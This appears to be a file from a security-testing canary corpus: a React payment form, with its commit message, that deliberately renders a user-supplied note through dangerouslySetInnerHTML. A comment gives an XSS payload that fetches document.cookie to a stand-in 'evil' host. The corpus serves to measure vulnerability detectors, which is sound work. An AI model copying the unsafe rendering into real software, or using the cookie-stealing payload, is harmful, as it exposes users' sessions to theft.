security-review/canary/web/PaymentForm.jsx
Adam Moussa 094a253c37
feat(canary): add anti-complacency recall-floor corpus + repo skip marker
Adds canary/ (the planted-vuln corpus from the local-only security-review-testbed,
answer-revealing comments stripped so it measures real detection) and canary-meta/
(KEY.md ground truth + CANARY_FLOOR=8, kept OUT of canary/ so detectors never read it).
One provider-pattern secret (sk_live_) was sanitized to a non-provider hardcoded key so
it stays a CWE-798 finding without tripping push protection.

Adds a root .security-review-skip so the org-wide sweep and the local pre-push gate skip
this repo's intentional vuln/fixture content; the nightly sweep scans canary/ directly as
its recall floor. 20 planted vulns (19 crit/high), 2 decoys, 3 traps.
2026-06-29 12:10:54 -04:00

15 lines
441 B
JavaScript

import React from "react";
export default function PaymentForm({ note, amount }) {
// A note of `<img src=x onerror=fetch('//evil/?c='+document.cookie)>` executes in the user's session.
return (
<div className="payment-form">
<h2>Confirm payment of ${amount}</h2>
<div
className="vendor-note"
dangerouslySetInnerHTML={{ __html: note }}
/>
<button type="submit">Pay</button>
</div>
);
}